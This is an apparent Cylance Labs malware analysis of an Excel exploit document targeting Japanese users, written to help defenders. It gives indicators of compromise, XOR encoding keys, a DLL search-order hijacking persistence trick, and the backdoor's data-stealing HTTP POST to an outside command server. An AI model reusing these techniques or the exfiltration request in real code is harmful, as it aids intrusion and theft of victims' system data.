Japan Targeted Perhaps Over Senkaku Digoyu Island Dispute

Over the past few weeks Cylance Labs identified a surge in targeted documents against Japanese users. These documents coincide perfectly with world news concerning recent escalating tensions between China and Japan over the disputed Senkaku/Diaoyu Islands. These files are being sent regularly to a number of different users and industries using a variety of old and new exploits. China often denies any involvement in ongoing cyber attacks; however, the ongoing dispute between the two countries has raised nationalistic pride on both sides and put the countries on edge.

We have decided to share some of our findings in hopes of empowering defenders to protect their systems.

Meta Information:

Filename: keikaku-201302.xls -> Translates as Plan-201302 MD5: 7ec89be945add54aa67009dbc12a9260 SHA1: 1434a04f10c2162eab82703ef79e407dcbf5c30f SHA256: 6d7b9f15cd8e3e75295e1c5ca46a3610e0e22b45d7bea18444b1f54e127131d0 FileSize: 172,564 Bytes

Document Structure Summary Information:

Operating System Version 5.1 Size: 12713 Bytes 'Root Entry' (root) 8192 bytes {00020820-0000-0000-C000-000000000046} '\x01CompObj' (stream) 112 bytes '\x05DocumentSummaryInformation' (stream) 72 bytes 'Workbook' (stream) 4733 bytes '_VBA_PROJECT_CUR' (storage) 'PROJECT' (stream) 424 bytes 'PROJECTwm' (stream) 62 bytes 'VBA' (storage) 'Sheet1' (stream) 1066 bytes 'ThisWorkbook' (stream) 985 bytes '_VBA_PROJECT' (stream) 2933 bytes 'dir' (stream) 804 bytes 'encryption' (stream) 1522 bytes

File Details:

The file was targeted at Japanese users and exploits CVE-2012-0158, which was first used in the wild in April of 2012. The binary is encoded within the document with a single byte XOR key of 0x12 and skips the first byte of the binary (0x4D). An empty dummy document is also decoded and loaded upon successful exploitation and is stored at file offset 0x23C14 with the single byte XOR key of 0x97.

Dropper Details:

FileSize: 153,600 Bytes MD5: C266FAA587136328C939D2BB25EA7D42

The interesting facet of this particular sample is the decoded binary does nothing but create the file “C:\Program Files\Internet Explorer\sxs.dll”. The “sxs.dll” file is stored within the dropper as a resource named “DATA” with a Chinese CodePage (2052). The backdoor takes advantage of a vulnerability known as DLL search order hijacking. Internet Explorer when executed will first load the “sxs.dll” file in the local directory as opposed to the legitimate “sxs.dll” file in the system32 directory, “%systemroot%\system32\”. So any file named “sxs.dll” in the same directory as the “iexplore.exe” binary will most likely be malicious in any future encounters. Investigators should add this to the list of known DLL search order hijacking locations including: %systemroot%\ntshrui.dll, %systemroot%\fxsst.dll, %systemroot%\linkinfo.dll, and %systemroot%\midimap.dll.

Backdoor Details:

FileSize: 78,336 Bytes MD5: 653C8AEAE41F0A008E3D31C13D92A038

When Internet Explorer is executed the file will be loaded into the process’s address space and create a mutex of “myhorse_ie_001”. The backdoor exports a function named “fuc_trend”.

NETWORK-BASED INDICATORS:

  • The malware will make DNS requests for “www.dotaplayers.com” which appears to be a legitimate small website hosting company.
  • The malware communicates over TCP port 80 using HTTP requests similar to the ones below.

POST /jd/upload.aspx?filepath=info&filename={Hostname}_{IP}.jpg HTTP/1.1
Host: www.dotaplayers.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Accept-Language: en-us
Content-Type: multipart/form-data
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cache-Control: no-cache
User-Agent: MyAgent
Content-Length: 3112

Where {Hostname} is the hostname of the victim system and {IP} is IP address of the system. The backdoor will also use the User-Agent “mydownload” when downloading files from the C2 server.

HOST-BASED INDICATORS:

  • The malware will create the file “%temp%\tmp.dat” and gather basic system information before encoding and sending it in the body of the POST request.
  • The malware may also create the following files in the %temp% directory.
  • cmd{decimal value}.dat
  • msuc.dat
  • order.dat
  • tmpxor.dat

HostName: {Hostname}
IP: {IP}
Proxy: (null)
User: Administrator
SystemDir: C:\WINDOWS\system32
OS Language Version: 437
System Version: 5.1 Service Pack 3 (Build 2600)

Process:
ID: 4 (?)
ID: 472 (\SystemRoot\System32\smss.exe)
ID: 888 (\??\C:\WINDOWS\system32\winlogon.exe)
ID: 932 (C:\WINDOWS\system32\services.exe)
ID: 944 (C:\WINDOWS\system32\lsass.exe)
ID: 1100 (C:\WINDOWS\system32\svchost.exe)
ID: 1364 (C:\WINDOWS\System32\svchost.exe)
ID: 1888 (C:\WINDOWS\Explorer.EXE)
ID: 188 (C:\WINDOWS\system32\spoolsv.exe)
ID: 400 (C:\Program Files\Parallels\Parallels Tools\Services\coherence.exe)
ID: 424 (C:\Program Files\Parallels\Parallels Tools\Services\prl_tools_service.exe)
ID: 536 (C:\Program Files\Parallels\Parallels Tools\Services\prl_tools.exe)
ID: 596 (C:\WINDOWS\system32\svchost.exe)
ID: 1572 (C:\Program Files\Parallels\Parallels Tools\prl_cc.exe)
ID: 1592 (C:\WINDOWS\system32\ctfmon.exe)
ID: 1656 (C:\WINDOWS\system32\wscntfy.exe)
ID: 3284 (C:\Program Files\Sandboxie\SbieSvc.exe)
ID: 2052 (C:\Program Files\Sandboxie\SbieCtrl.exe)
ID: 2744 (C:\WINDOWS\system32\cmd.exe)
ID: 868 (C:\Python26\python.exe)
ID: 3560 (C:\Program Files\Internet Explorer\iexplore.exe)
ID: 1688 (C:\Program Files\Internet Explorer\iexplore.exe)

Figure 1: Example contents of "tmp.dat" Data like that shown in the figure above is first converted to Unicode and then encoded with XOR against the key “*&~^%@0hh8979” before being sent to the C2 server.

Conclusion

The network traffic for this specific trojan can readily be identified from the static User-Agents used within the code including “MyAgent” and “mydownload”. While these attacks appear to be limited in scope, this novel persistence method will undoubtedly be applied in future malicious endeavors by the attackers. Investigators should diligently investigate any files named “sxs.dll” in the same directory as Internet Explorer.

Users are encouraged to be wary of any attachments received using a “.doc” or“.xls” extension. Modern versions of Microsoft Office (2007+) will by default save documents using the newer Office Open XML format with a “.docx” or “.xlsx” extension. Cylance Labs has yet to identify a malicious office document in these attacks, which takes advantage of the OOXML format.